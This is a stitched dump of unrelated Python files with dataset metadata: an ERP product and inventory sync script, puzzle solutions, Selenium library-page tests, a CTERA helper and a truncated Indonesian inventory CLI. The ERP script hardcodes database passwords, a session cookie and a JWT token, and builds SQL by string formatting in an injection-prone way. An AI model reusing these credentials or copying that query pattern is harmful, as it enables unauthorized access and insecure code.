            continue
    return kept
def trim(s):
    """
    删除字符串首位空格

    Strip leading and trailing space characters (only ' ', not other
    whitespace).  Replaces the original recursive implementation, which
    recursed once per stripped space and could exceed the recursion limit
    on long runs of spaces; str.strip(' ') has identical semantics.
    """
    return s.strip(' ')
# 连接数据库
# engine = create_engine(
# 'mysql+pymysql://leiming:pQx2WhYhgJEtU5r@rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com:3306/plutus')
# conn = pymysql.connect(host='rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com',
# port=3306, user='leiming',
# passwd='pQx2WhYhgJEtU5r',
# db="plutus",
# charset='utf8')
# 连接数据库(测试)
engine = create_engine(
'mysql+pymysql://leiming:vg4wHTnJlbWK8SY@rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com:3306/plutus')
conn = pymysql.connect(host='rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com',
port=3306, user='leiming',
passwd='vg4wHTnJlbWK8SY',
db="plutus",
charset='utf8')
# 读取数据
PATH = '/Users/edz/Documents'
url ='https://erp.banmaerp.com/Product/Spu/ExportHandler'
data = 'filter=%7B%22CreateTime%22%3A%7B%22Sort%22%3A-1%7D%7D'
headers = {
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'cookie': '.AspNetCore.Session=CfDJ8HFZt5KhGHxPrfAKn%2Fe35kaRpPerMJVnDOQnJCjicT8lyd81AtsUwStenh5nUMsWpyuS%2Bu38igf9ADjk2fhr6CYTk87TukhPs3Uqvid6CI4gSaSqYkM7fHDGw4xEnUKIIhoVh5nzaNU57l2OfpixmIgipBDXzggD1pciKOzkXQdc; Hm_lvt_9be79ac4f097e2a0be24ee6c088e921b=1603200345,1603247430; ERP.Token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJJRCI6Ijc1MjIiLCJOYW1lIjoi6Zu35pmT5pmoIiwiVXNlclR5cGUiOiIzIiwiT3duVXNlcklEIjoiNzA0MCIsImV4cCI6MTYzNDc5MzM3MSwiaXNzIjoiRVJQLmJhbm1hZXJwLmNvbSIsImF1ZCI6IkVSUC5iYW5tYWVycC5jb20ifQ.r5r1FrpMRa_yWr3qxuLnrJXUAZST_CC6V8nt2V-MbxM; Hm_lpvt_9be79ac4f097e2a0be24ee6c088e921b=1603257395'}
r = requests.post(url=url, headers=headers, data=data)
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
file.write(r.content)
data_cp = read_table(file_name)
os.remove(file_name)
# 删除第一列主标题
if "本地产品" in data_cp.columns.tolist():
data_cp = pd.DataFrame(data_cp.iloc[1:].values, columns=data_cp.iloc[0, :])
print(data_cp.columns)
print(data_cp.head())
# 增加specs_one,specs_two,is_delete,category项
data_cp['specs_one'] = data_cp['规格']
data_cp['specs_two'] = data_cp['规格']
data_cp['is_delete'] = np.where(data_cp['状态'] == '已删除', 1, 0)
data_cp['category'] = data_cp['斑马类目']
# 删除spu 和sku状态为已删除的records
data_cp['delete'] = data_cp['is_delete']
data_cp['delete'] = np.where(data_cp['SPU状态'] == '已删除', 1, data_cp['delete'])
data_cp = data_cp[data_cp['delete'] != 1]
data_cp = data_cp.drop(columns='delete')
data_cp = data_cp.reset_index()
# 修改specs_one(color) specs_two(size) spu图集(用','分割)
for i in range(data_cp.shape[0]):
# 修改category为品类的根结点
data_cp.loc[i, 'category'] = str(data_cp.loc[i, 'category']).split('»')[-1]
data_cp.loc[i, 'SPU图集'] = data_cp.loc[i, 'SPU图集'].replace('\n', ',')
if len(data_cp.loc[i, 'specs_two'].split(';')) >= 2:
data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two'].split(';')[1]
data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one'].split(';')[0]
elif len(data_cp.loc[i, 'specs_two']) > 2 and data_cp.loc[i, 'specs_two'] != 'One Size':
data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one']
data_cp.loc[i, 'specs_two'] = np.nan
else:
data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two']
data_cp.loc[i, 'specs_one'] = np.nan
# size同类合并
data_cp['specs_two'] = np.where(
(data_cp['specs_two'] == 'One-Size') | (data_cp['specs_two'] == 'one-size') | (data_cp['specs_two'] == 'One Size'),
'One Size', data_cp['specs_two'])
# 得到size 和color的唯一值(用于创建product_attr表)
specs_two = data_cp['specs_two'].unique()
specs_one = data_cp['specs_one'].unique()
# 删除含有中文字符的值
specs_two = is_chinese(specs_two)
specs_one = is_chinese(specs_one)
for i in range(data_cp.shape[0]):
if data_cp.loc[i, '标题'].startswith('\"'):
data_cp.loc[i, '标题'] = data_cp.loc[i, '标题'].replace('\"','\'')
# 给数据库中product表插入数据:
"""
product 插入数据
"""
data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
# 插入data_cp表中spu数据
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
# 以spu_code为primary key 进行插入数据
sql = "select spu_code from product where spu_code='{0}'".format(data_cp.loc[i, 'SPU编码'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product (product_name,spu_code, primary_image, add_time, product_images, zebra_spu_id) VALUES ("{0}",'{1}','{2}',now(),'{3}',{4})'''.format(
data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
engine.execute(sql)
else:
sql = '''UPDATE product SET product_name ="{0}",primary_image = "{2}",add_time=now(),product_images="{3}",zebra_spu_id={4} WHERE spu_code = "{1}"'''.format(
data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
engine.execute(sql)
print('刷完产品')
"""
更新data_cp表中的product_id
"""
# 取出刚刚写入数据库里的product表及其id,根据spu,插入到data_cp里
data_p_id = pd.read_sql_table('product', engine)
data_p_id = data_p_id[['id', 'spu_code']]
data_cp = data_cp.merge(data_p_id, left_on='SPU编码', right_on='spu_code')
# 给数据库中product attr表插入数据
# 插入color属性
"""
product_attr 插入数据
需要: specs_one, specs_two 两个关于color属性和size属性的table
"""
# for i in range(len(specs_one)):
# with conn.cursor() as cursor:
# sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_one[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 1, NULL)".format(
# specs_one[i])
# engine.execute(sql)
#
# # 插入size属性
# for i in range(len(specs_two)):
# with conn.cursor() as cursor:
# sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_two[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 2, NULL)".format(
# specs_two[i])
# engine.execute(sql)
"""
更新data_cp表中的specs_one_id和specs_two_id
删除data_cp中属性含有中文字,并把属性id同步到data_cp表中
"""
# 将插入完成后的product_attr表读出,
data_product_attr = pd.read_sql_table('product_attr', engine)
# 删除data_cp里,color或size属性带中文字符的records
for i in range(data_cp.shape[0]):
if not data_cp.loc[i, 'specs_one'] in specs_one:
data_cp.loc[i, 'specs_one'] = -1
if not data_cp.loc[i, 'specs_two'] in specs_two:
data_cp.loc[i, 'specs_two'] = -1
data_cp = data_cp[~((data_cp['specs_two'] == -1) | (data_cp['specs_one'] == -1))]
# 并且通过合并product_attr表,来获取每行size和color属性对应的属性id
cur = data_cp.merge(data_product_attr, left_on='specs_one', right_on='attr_name', how='left')
data_cp = cur.merge(data_product_attr, left_on='specs_two', right_on='attr_name', how='left')
data_cp = data_cp.astype(object).where(pd.notnull(data_cp), "NULL")
# 添加sku main进数据库:
"""
sku_main插入数据
需要data_cp(包括更新的product_id 和specs_id)
"""
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
# 以sku_code为primary key 进行插入数据,查看要插入的数据sku
sql = "select sku_code from sku_main where sku_code='{0}'".format(data_cp.loc[i, 'SKU编码'])
cursor.execute(sql)
r = cursor.fetchone()
# 如果返回为none,则说明该sku不存在于数据库,进行插入操作
if r is None:
sql = 'INSERT INTO sku_main (sku_code,product_id ,specs_one, specs_two, specs_three, ' \
'cost_price, cost_currency, sale_price, sale_currency,' \
'sku_style, primary_image, is_delete, add_time,' \
'secondary_images, weight, length, height, width, name,' \
'en_name, is_effective, zebra_sku_id) ' \
'VALUES ("{0}",{1},{2},{3},NULL,{4},"RMB",NULL,"USD",NULL,"{5}",{6},now(),"{7}",{8},{9},{10},{11},NULL,NULL, 1,{12})'.format(
data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
engine.execute(sql)
else:
sql = '''UPDATE sku_main SET product_id ={1},specs_one = {2},specs_two={3},cost_price={4},cost_currency="RMB", sale_currency = "USD",primary_image = "{5}",
is_delete= {6},add_time = now(),secondary_images = "{7}", weight = {8}, length = {9},height ={10}, width = {11}, is_effective = 1,zebra_sku_id = {12}
WHERE sku_code = "{0}"'''.format(
data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
engine.execute(sql)
print('刷完sku_main')
"""
插入product_tag表所有标签
需要data_cp中所有的标签集合
"""
# 设置tag list来储存所有标签属性(unique),剔除所有标签为空的records
tag = []
notnull_cp = data_cp[~(data_cp['标签'] == "NULL")]
for i in range(notnull_cp.shape[0]):
tag += str(notnull_cp.iloc[i, 4]).split(',')
tag = list(set(tag))
# 将得到的标签属性值导入到数据库的product_tag表中,得到tag对应的tag_id
# for i in range(len(tag)):
# with conn.cursor() as cursor:
# sql = '''SELECT * FROM product_tag WHERE tag_name = "{0}" '''.format(tag[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO product_tag (tag_name, add_time) VALUES ("{0}",now())'''.format(tag[i])
# engine.execute(sql)
# 设置id list和tag list 将data_cp中的id和该id对应的多个tag组成二元tuple
tr_id = []
tr_tag = []
notnull_cp = notnull_cp.reset_index()
for i in range(notnull_cp.shape[0]):
if ',' not in str(notnull_cp.loc[i, '标签']):
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(notnull_cp.loc[i, '标签'])
else:
for tags in str(notnull_cp.loc[i, '标签']).split(','):
if len(tags) > 1:
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(tags)
tuples = list(zip(tr_id, tr_tag))
# 将这两列转化为dataframe
tr = pd.DataFrame(tuples, columns=['product_id', 'tags_name'])
# 删除重复项
tr = tr.drop_duplicates()
# 读出product_tag得到tag及其对应的id,将tag_id通过tag_name合并到product_id上
product_tag = pd.read_sql_table('product_tag', engine)
tr = tr.merge(product_tag, left_on='tags_name', right_on='tag_name', how='left')
tr = tr.dropna(subset=['id'])
tr = tr.reset_index()
"""
插入product_tag_relation表所有tag_id和product_id对应关系
需要tr表(有tag_id 和 product_id 以及 tag_name)
"""
# 将tag_id,product_id写入到product_tag_relation表
for i in range(tr.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_tag_relation WHERE tag_id = {0} and product_id = {1}'''.format(tr.loc[i, 'id'], tr.loc[i, 'product_id'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_tag_relation (tag_id, product_id) VALUES ({0},{1})'''.format(
tr.loc[i, 'id'], tr.loc[i, 'product_id'])
engine.execute(sql)
print('刷完product_tag_relation')
"""
更新product中的supplier_id数据
需要supplier表和data_cp
"""
# 从数据库中读出供应商表,并筛选出supplier_name和对应的id
supplier = pd.read_sql_table('supplier', engine)
supplier = supplier[['id', 'supplier_name']]
supplier.rename(columns={'id': 'supplier_id'}, inplace=True)
# 将供应商id加到data_cp中,通过供应商名字
data_cp = data_cp.merge(supplier, left_on='默认供应商', right_on='supplier_name', how='left')
# 更新product表中的供应商id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
try:
sql = 'UPDATE product SET supplier_id ={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'supplier_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
except:
continue
print('刷完product中supplier id')
# 从数据库中读出品类,并筛选出category_name和对应的id
category = pd.read_sql_table('product_category', engine)
category = category[['id', 'category_name']]
# 删除品类中的字符串的首位空格
for i in range(data_cp.shape[0]):
data_cp.loc[i, 'category'] = trim(data_cp.loc[i, 'category'])
category.rename(columns={'id': 'category_id'}, inplace=True)
# 将品类id对应带data_cp上通过category
data_cp = data_cp.merge(category, left_on='category', right_on='category_name', how='left')
# data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
data_cp = data_cp.dropna(subset = ['category_id'])
data_cp = data_cp.reset_index()
"""
更新product表中的category_id
data_cp表中的category和product_category中的id
"""
# 更新product中的品类id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
sql = 'UPDATE product SET product_category={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'category_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
print('刷完product中product category id')
# 从数据库product表中读取供应商id和产品id
sup = pd.read_sql_table('product', engine)
sup = sup[['id', 'supplier_id']]
sup = sup[~sup['supplier_id'].isnull()][['supplier_id', 'id']]
# 删除重复项
sup = sup.drop_duplicates()
sup = sup.reset_index()
"""
插入product_supplier表中supplier_id, product_id
需要product表获取product_id和supplier_id
"""
# 将供应商id和产品id导入到product_supplier表中
for i in range(sup.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_supplier WHERE supplier_id = {0} AND product_id = {1}'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_supplier (supplier_id, product_id) VALUES ({0}, {1})'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
engine.execute(sql)
print('刷完product_supplier')
# 更新sku_id_code_dic数据库
sku_id_code_dic = data_cp[['SKUID', '系统SPUID', 'SKU编码', '成本价', '重量']]
sku_id_code_dic = sku_id_code_dic.drop_duplicates()
sku_id_code_dic = sku_id_code_dic.reset_index()
# for i in range(sku_id_code_dic.shape[0]):
# with conn.cursor() as cursor:
# # 以spu_id sku_id,为primary key 进行插入数据
# sql = "select sku_code from sku_id_code_dic where spu_id='{0}' and sku_id='{1}'".format(sku_id_code_dic.loc[i, '系统SPUID'],sku_id_code_dic.loc[i, 'SKUID'])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO sku_id_code_dic (sku_id,spu_id, sku_code, sku_price, sku_weight) VALUES ({0},{1},'{2}',{3},{4})'''.format(
# int(sku_id_code_dic.loc[i, 'SKUID']), int(sku_id_code_dic.loc[i, '系统SPUID']), sku_id_code_dic.loc[i, 'SKU编码'],
# sku_id_code_dic.loc[i, '成本价'], sku_id_code_dic.loc[i, '重量'])
# engine.execute(sql)
url = 'https://erp.banmaerp.com/Stock/SelfInventory/ExportDetailHandler'
data = 'filter=%7B%22Quantity%22%3A%7B%22Sort%22%3A-1%7D%2C%22WarehouseID%22%3A%7B%22Value%22%3A%5B%22adac18f9-a30e-4a4b-937f-ac6700e80334%22%5D%7D%2C%22Pager%22%3A%7B%22PageSize%22%3A10000%2C%22PageNumber%22%3A1%7D%7D'
r = requests.post(url=url, headers=headers, data=data)
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
file.write(r.content)
d = read_table(file_name)
print(d.head())
print(d.columns)
data = xlrd.open_workbook(file_name)
os.remove(file_name)
table = data.sheets()[0]
nrows = table.nrows
col_dic = {}
index = 1
cur_test = conn.cursor()
# 获取字段名称
for col_index in table.row(0):
col_dic[index] = col_index.value
index += 1
# 开始处理数据
for row in range(1, nrows):
print(row)
data_list = []
i = 1
col_item_dic = {}
# 获取一行数据
for col in table.row(row):
col_item_dic[col_dic[i]] = col.value
i += 1
# 判断货位是否存在
sql = '''select id from warehouse_location where warehouse_location_code='{0}' and warehouse_id = 1'''.format(col_item_dic['货位'])
cur_test.execute(sql)
r = cur_test.fetchone()
if r is None:
sql = '''insert into warehouse_location(warehouse_id, warehouse_location_code) values(1, '{0}')'''.format(col_item_dic['货位'])
print(sql)
cur_test.execute(sql)
location_id = conn.insert_id()
print('插入新货位成功')
print(location_id)
conn.commit()
else:
location_id = r[0]
print('刷完库位')
# # 判断是否有SKU
# get_sku_id_sql = '''select id from sku_main where sku_code = '{0}' '''.format(col_item_dic['本地SKU'])
# cur_test.execute(get_sku_id_sql)
# r = cur_test.fetchone()
# if r is None:
# print(col_item_dic['本地SKU'] + '不存在sku_main里面!!')
# continue
# else:
# sku_id = r[0]
# # 更新库存
# total_num = col_item_dic['库存总量'] if '库存总量' in col_item_dic else 'NULL'
# free_num = col_item_dic['合格空闲量'] if '合格空闲量' in col_item_dic else 'NULL'
# lock_num = col_item_dic['合格锁定量'] if '合格锁定量' in col_item_dic else 'NULL'
# imperfect_num = col_item_dic['残次总量'] if '残次总量' in col_item_dic else 'NULL'
#
# total_num = int(total_num) if total_num != '' else 'NULL'
# free_num = int(free_num) if free_num != '' else 'NULL'
# lock_num = int(lock_num) if lock_num != '' else 'NULL'
# imperfect_num = int(imperfect_num) if imperfect_num != '' else 'NULL'
#
# get_exist_stock = '''select id from warehouse_stock where sku_id={0} and warehouse_id = 1 and warehouse_location_id = {1}'''.format(sku_id, location_id)
# cur_test.execute(get_exist_stock)
# r = cur_test.fetchone()
# if r is None:
# insert_sql = '''insert into warehouse_stock(sku_id,warehouse_id,warehouse_location_id,total_num,free_num,lock_num,imperfect_num)
# values({0},1,{1},{2},{3},{4},{5})'''.format(sku_id, location_id, total_num, free_num, lock_num, imperfect_num)
# # print(insert_sql)
# cur_test.execute(insert_sql)
# conn_test.commit()
# else:
# update_sql = '''update warehouse_stock set total_num = {0}, free_num = {1}, lock_num = {2}, imperfect_num = {3}
# where sku_id = {4} and warehouse_id = {5} and warehouse_location_id = {6}'''.format(total_num, free_num, lock_num, imperfect_num, sku_id, 1, location_id)
# # print(update_sql)
# cur_test.execute(update_sql)
# conn_test.commit() | yourant/ERPdata_Transfer | products_transfer.py | products_transfer.py | py | 21,610 | python | en | code | 0 | github-code | 36 |
28849898421 | #The provided code stub will read in a dictionary containing key/value
#pairs of name:[marks] for a list of students. Print the average of the
#marks array for the student name provided, showing 2 places after the decimal.
#Input Format
#The first line contains the integer n, the number of students' records.
#The next n lines contain the names and marks obtained by a student, each
#value separated by a space. The final line contains query_name, the name
#of a student to query.
if __name__ == '__main__':
    def read_scores(students):
        """Read one 'name m1 m2 ...' line from stdin and record the average mark."""
        fields = input().split()
        name = fields[0]
        marks = [float(m) for m in fields[1:]]
        # Average over however many marks were given (the original hard-coded
        # a divisor of 3, the mark count in the HackerRank problem; this is
        # identical for that input but also correct for other counts).
        students[name] = sum(marks) / len(marks)

    # First line: number of records; then one record per line.
    n = int(input())
    students = {}
    for _ in range(n):
        read_scores(students)
    # Final line: the student to query; print their average to 2 decimals.
    print('%.2f' % students[input()])
| CHIRAG3899/Hackerrank | Python Hackerrank/11 Finding the percentage.py | 11 Finding the percentage.py | py | 874 | python | en | code | 0 | github-code | 36 |
6084331741 | import collections
def number_of_islands(grid):
    """Count connected groups of "1" cells (4-directional adjacency) via BFS.

    The input grid is not modified; visited cells are tracked in a set.
    """
    if not grid:
        return 0

    rows, cols = len(grid), len(grid[0])
    seen = set()
    count = 0

    def explore(sr, sc):
        # Breadth-first flood fill from (sr, sc) over connected "1" cells.
        frontier = collections.deque([(sr, sc)])
        seen.add((sr, sc))
        while frontier:
            cr, cc = frontier.popleft()
            for nr, nc in ((cr + 1, cc), (cr - 1, cc), (cr, cc + 1), (cr, cc - 1)):
                if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] == "1" and (nr, nc) not in seen:
                    seen.add((nr, nc))
                    frontier.append((nr, nc))

    # Each unvisited "1" cell starts a new island.
    for r in range(rows):
        for c in range(cols):
            if grid[r][c] == "1" and (r, c) not in seen:
                explore(r, c)
                count += 1
    return count
| phuclinh9802/data_structures_algorithms | blind 75/number_of_islands.py | number_of_islands.py | py | 1,416 | python | en | code | 0 | github-code | 36 |
19933632487 | """
Your Library Page Testing
This script tests the Your Library Page functions and report the results to allure
This script requires `allure` and `pytest` be installed within the Python environment you are running this script in
"""
import time
import allure
import pytest
from Web_Testing.Pages.WebPlayerLibrary import WebPlayerLibrary
from Web_Testing.helperClasses import WebHelper
from Web_Testing.Pages.LoginPage import LoginPage
from Web_Testing.Pages.SignupPage import SignupPage
from Web_Testing.Pages.WebPlayerHome import WebPlayerHome
from Web_Testing.Pages.LoggedOutHome import LoggedOutHome
from selenium import webdriver
from Web_Testing.helperClasses import ConstantsClass
@allure.parent_suite("End to End testing")
@allure.suite("Your Library Page")
@allure.feature("Your Library Page")
@allure.severity(allure.severity_level.BLOCKER)
class TestWebPlayerLibrary:
    """Selenium end-to-end tests for the web player's "Your Library" page.

    A single Firefox session is created at class-definition time and shared
    by every test; the fixtures below only navigate/refresh that session.
    NOTE(review): the fixed time.sleep() waits make these tests timing
    sensitive; explicit WebDriverWait conditions would be more robust.
    """

    # Shared browser session for the whole class (started on class creation).
    driver = WebHelper().firefox_driver_init()
    helper = WebHelper()
    helper.set_driver(driver)

    # Fixture: start from the login page; refresh the browser afterwards.
    @pytest.yield_fixture
    def setup_initial(self):
        self.driver.get(WebHelper().get_login_url())
        self.driver.maximize_window()
        yield
        self.driver.refresh()

    # Fixture: start from the web-player home page (browser kept open).
    @pytest.yield_fixture
    def setup(self):
        self.driver.get(self.helper.base_url + "webplayer/home")
        self.driver.maximize_window()
        yield
        # self.driver.close()

    # Fixture: like `setup`, but closes the browser when the test finishes.
    @pytest.yield_fixture
    def setup_final(self):
        self.driver.get(self.helper.base_url + "webplayer/home")
        self.driver.maximize_window()
        yield
        self.driver.close()

    # Test #1 -> Your Library Button
    @allure.severity(allure.severity_level.BLOCKER)
    @allure.story("Testing Your Library Liked Songs Play Button")
    @allure.title("Liked Songs Play Button")
    @allure.description("Testing Your Library Liked Songs Play Button")
    @pytest.mark.Do
    @pytest.mark.YourLibrary
    def test_case_1(self, setup_initial):
        # Log in, open Your Library, and verify the Liked Songs card responds.
        time.sleep(3)
        lp = LoginPage(self.driver)
        lp.login_to_spotify("test1@test.com", "test123")
        time.sleep(3)
        self.driver.get(self.helper.base_url + "webplayer/home")
        time.sleep(3)
        web_player_home = WebPlayerHome(self.driver)
        web_player_home.click_your_library()
        time.sleep(2)
        web_player_library = WebPlayerLibrary(self.driver)
        if web_player_library.check_liked_songs_click():
            self.helper.report_allure("SUCCESS: Your Library Liked songs cards are functional")
            assert True
        else:
            self.helper.report_allure("FAILURE: Your Library Liked songs cards are not functional")
            assert False

    # Test #2 -> Playlists Cards
    @allure.severity(allure.severity_level.BLOCKER)
    @allure.story("Testing Your Library playlists cards")
    @allure.title("Playlists cards")
    @allure.description("Testing Your Library Playlists cards")
    @pytest.mark.Do
    @pytest.mark.YourLibrary
    def test_case_2(self, setup):
        # Reuses the session logged in by test_case_1 (tests are order-dependent).
        time.sleep(2)
        web_player_home = WebPlayerHome(self.driver)
        web_player_home.click_your_library()
        time.sleep(2)
        web_player_library = WebPlayerLibrary(self.driver)
        if web_player_library.check_card_click(0, True):
            self.helper.report_allure("SUCCESS: Your Library page playlist cards are functional")
            assert True
        else:
            self.helper.report_allure("FAILURE: Your Library page playlist cards are not functional")
            assert False

    # Test #3 -> Liked Songs Text Button
    @allure.severity(allure.severity_level.BLOCKER)
    @allure.story("Clicking on the Liked Songs Text in the card in Your Library Page")
    @allure.title("Clicking Liked Songs Card text")
    @allure.description("Clicking on the Liked Songs Text in the card in Your Library Page")
    @pytest.mark.Do
    @pytest.mark.YourLibrary
    def test_case_3(self, setup):
        # Clicking the card text should navigate to the liked-songs play page.
        time.sleep(2)
        web_player_home = WebPlayerHome(self.driver)
        web_player_home.click_your_library()
        time.sleep(2)
        web_player_library = WebPlayerLibrary(self.driver)
        web_player_library.click_liked_songs_txt()
        if self.helper.url_has("webplayer/likedplay"):
            self.helper.report_allure("SUCCESS: The Liked Songs Card button in your Library page is functional")
            assert True
        else:
            self.helper.report_allure("FAILURE: The Liked Songs Card button in your Library page is not functional")
            assert False

    # Test #4 -> Your Library Button with empty playlist
    @allure.severity(allure.severity_level.BLOCKER)
    @allure.story("Testing Your Library Liked Songs Play Button with empty playlist")
    @allure.title("Liked Songs Play Button with empty playlist")
    @allure.description("Testing Your Library Liked Songs Play Button with empty playlist")
    @pytest.mark.Do
    @pytest.mark.YourLibrary
    def test_case_4(self, setup_final):
        # Switch to a second account (presumably with an empty library) and
        # repeat the Liked Songs check -- TODO confirm account state.
        web_player_home = WebPlayerHome(self.driver)
        web_player_home.click_logout()
        time.sleep(2)
        web_player_home.click_login()
        time.sleep(3)
        lp = LoginPage(self.driver)
        lp.login_to_spotify("abdallah@gmail.com", "1234567")
        time.sleep(3)
        self.driver.get(self.helper.base_url + "webplayer/home")
        time.sleep(3)
        web_player_home = WebPlayerHome(self.driver)
        web_player_home.click_your_library()
        time.sleep(2)
        web_player_library = WebPlayerLibrary(self.driver)
        if web_player_library.check_liked_songs_click():
            assert True
        else:
            assert False
| Project-X9/Testing | Web_Testing/Tests/test_yourLibrary.py | test_yourLibrary.py | py | 5,634 | python | en | code | 0 | github-code | 36 |
8670535309 | import logging
from cterasdk import CTERAException
def suspend_filer_sync(self=None, device_name=None, tenant_name=None):
"""Suspend sync on a device"""
logging.info("Starting suspend sync task.")
try:
device = self.devices.device(device_name, tenant_name)
device.sync.suspend(wait=True)
logging.info("Suspended sync on %s", device.name)
except Exception as e:
logging.warning(e)
logging.error("Error suspending sync")
| ctera/ctools | suspend_sync.py | suspend_sync.py | py | 477 | python | en | code | 4 | github-code | 36 |
19509726145 | #README
'''
buka file dengan cara mengetikan:
python main.py "folder_yang_berisi_data_csv"
selama fungsi login belum jadi, cara keluar program adalah control + "c"
'''
#import modul yang dibuat
from read_csv import load
from add_data import *
from write_csv import save
from login import login
from caritahun import cari_tahun
from see_history import see_gadget_return_history,see_consumable_history,see_gadget_borrow_history
from interface import *
import argparse
import os,time
#inisialisasi Data (Loading Data dari CSV)
parser = argparse.ArgumentParser()
parser.add_argument("folder_location", help="Location of the folder that contains all the data.",nargs='?', const='')
args = parser.parse_args()
if args.folder_location is None:
print("Tidak ada folder yang dimasukkan")
exit()
current_path=os.getcwd()
new_path=os.path.join(current_path,args.folder_location)
if os.path.exists(new_path):
data=load(args.folder_location)
else:
print("Folder tidak ada")
exit()
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#Algoritma Program
#User diminta untuk login
valid=False
while not valid:
valid,curret_id,curret_role=login(user)
while valid:
pilihan=input("Masukkan Pilihan Menu: ")
#Masukkan Fungsi-Fungsi Yang Sudah dibuat disini (F01-F17)
#F01 - Register
if pilihan=='register':
if curret_role=='admin':
add_data_user(user)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F02 - Login
#Sudah di atas
#F03 - Pencarian Gadget Berdasarkan Rarity
if pilihan == "carirarity":
rarity=input("Masukkan rarity yang akan dicari: ")
if rarity=='S' or rarity=='A' or rarity=='B' or rarity=='C':
found=False
for j in range(len(gadget)):
if rarity==gadget[j][4]:
found=True
print("Nama Gadget : ",gadget[j][1])
print("Deskripsi : ",gadget[j][2])
print("Jumlah : ",gadget[j][3])
print("Rarity : ",gadget[j][4])
print("Tahun Ditemukan : ",gadget[j][5])
print("")
if not found:
print("Tidak ada gadget dengan rarity tersebut")
else:
print("Rarity tidak valid")
#F04 - Pencarian Gadget Berdasarkan Tahun
if pilihan=='caritahun':
cari_tahun(gadget)
#F05 - Menambah Item
if pilihan == "tambahitem":
if curret_role=='admin':
cek = 0 #untuk mengecek apakah id_item sudah ada
id_item = input("Masukkan ID: ")
if id_item[0] == 'G':
for i in range(1,len(gadget)):
if gadget[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_gadget(id_item,gadget)
elif id_item[0] == 'C':
for i in range(1,len(consumable)):
if consumable[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_consumable(id_item,consumable)
else:
print("Gagal menambahkan item karena ID tidak valid")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F06 - Menghapus Item
if pilihan=='hapusitem':
if curret_role=='admin':
id_item_yang_akan_dihapus=input("Masukkan ID item yang akan dihapus : ")
if id_item_yang_akan_dihapus[0]=='G':
